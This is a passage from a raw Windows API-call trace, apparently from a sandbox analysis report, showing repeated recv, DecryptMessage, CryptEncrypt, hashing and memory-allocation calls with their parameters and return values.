pfQOP=0x0 | out: pMessage=0x37dfaec, pfQOP=0x0) returned 0x80090318 [0142.044] recv (in: s=0x5b0, buf=0x3de7008, len=16413, flags=0 | out: buf=0x3de7008*) returned 543 [0142.431] DecryptMessage (in: phContext=0x3d81944, pMessage=0x37dfaec, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37dfaec, pfQOP=0x0) returned 0x0 [0142.431] malloc (_Size=0x1fd) returned 0x3df0420 [0142.431] free (_Block=0x0) [0142.431] malloc (_Size=0x1fd) returned 0x3def350 [0142.431] free (_Block=0x0) [0142.431] free (_Block=0x0) [0142.432] free (_Block=0x3df0420) [0142.432] malloc (_Size=0x1fd) returned 0x3df0420 [0142.432] free (_Block=0x0) [0142.432] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.432] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.432] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.432] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.432] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.432] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.432] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.432] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.432] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.432] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.432] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.432] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.432] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.432] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.433] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.433] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.433] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.433] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.433] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.433] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.433] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.433] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.433] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.433] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.433] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.433] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.433] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.433] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.433] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.433] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.433] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.433] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.433] malloc (_Size=0x1fd) returned 0x3def558 [0142.434] free (_Block=0x0) [0142.434] free (_Block=0x3def350) [0142.434] free (_Block=0x3df0420) [0142.434] malloc (_Size=0x1fd) returned 0x3def350 [0142.434] free (_Block=0x0) [0142.434] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.434] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.434] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.434] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.434] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.434] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.434] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.434] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.434] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.434] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.434] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.434] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.434] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.434] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.435] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.435] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.435] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.435] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.435] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.435] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.435] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.435] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.435] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.435] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.435] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.435] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.435] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.435] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.435] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.435] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.435] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.435] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.435] malloc (_Size=0x1fd) returned 0x3df0420 [0142.436] free (_Block=0x0) [0142.436] free (_Block=0x3def558) [0142.436] malloc (_Size=0x1fd) returned 0x3def558 [0142.436] free (_Block=0x0) [0142.436] CryptDuplicateHash (in: hHash=0x432eb8, pdwReserved=0x0, dwFlags=0x0, phHash=0x37dfb14 | out: phHash=0x37dfb14) returned 1 [0142.436] CryptHashData (hHash=0x4327f8, pbData=0x3def558, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0142.436] malloc (_Size=0x14) returned 0x3f65500 [0142.436] free (_Block=0x0) [0142.436] CryptGetHashParam (in: hHash=0x4327f8, dwParam=0x2, pbData=0x3f65500, pdwDataLen=0x37dfacc, dwFlags=0x0 | out: pbData=0x3f65500, pdwDataLen=0x37dfacc) returned 1 [0142.436] CryptHashData (hHash=0x432eb8, pbData=0x3def558, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0142.436] free (_Block=0x3f65500) [0142.436] CryptDestroyHash (hHash=0x4327f8) returned 1 [0142.436] free (_Block=0x3def558) [0142.436] free (_Block=0x3def350) [0142.436] malloc (_Size=0x1fd) returned 0x3def350 [0142.436] free (_Block=0x0) [0142.436] free (_Block=0x0) [0142.436] free (_Block=0x0) [0142.436] SetEvent (hEvent=0x5d0) returned 1 [0142.436] SetEvent (hEvent=0x5c8) returned 1 [0142.436] free (_Block=0x0) [0142.436] free (_Block=0x3def350) [0142.436] free (_Block=0x3df0420) [0142.436] DecryptMessage (in: phContext=0x3d81944, pMessage=0x37dfaec, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37dfaec, pfQOP=0x0) returned 0x80090318 [0142.437] recv (in: s=0x5b0, buf=0x3de7008, len=16413, flags=0 | out: buf=0x3de7008*) returned 3627 [0142.800] DecryptMessage (in: phContext=0x3d81944, pMessage=0x37dfaec, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37dfaec, pfQOP=0x0) returned 0x0 [0142.800] malloc (_Size=0x1fd) returned 0x3df0420 [0142.800] free (_Block=0x0) [0142.800] malloc (_Size=0x1fd) returned 0x3def350 [0142.800] free (_Block=0x0) [0142.800] free (_Block=0x0) [0142.800] free (_Block=0x3df0420) [0142.800] malloc (_Size=0x1fd) returned 0x3df0420 [0142.801] free (_Block=0x0) [0142.801] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.801] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.801] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.801] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.801] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.801] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.801] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.801] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.801] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.801] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.801] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.801] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.801] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.801] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.801] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.802] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.802] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.802] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.802] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.802] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.802] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.802] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.802] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.803] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.803] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.803] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.803] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.803] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.803] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.803] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.803] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.803] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.803] malloc (_Size=0x1fd) returned 0x3def558 [0142.804] free (_Block=0x0) [0142.804] free (_Block=0x3def350) [0142.804] free (_Block=0x3df0420) [0142.804] malloc (_Size=0x1fd) returned 0x3def350 [0142.804] free (_Block=0x0) [0142.804] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.804] CryptEncrypt 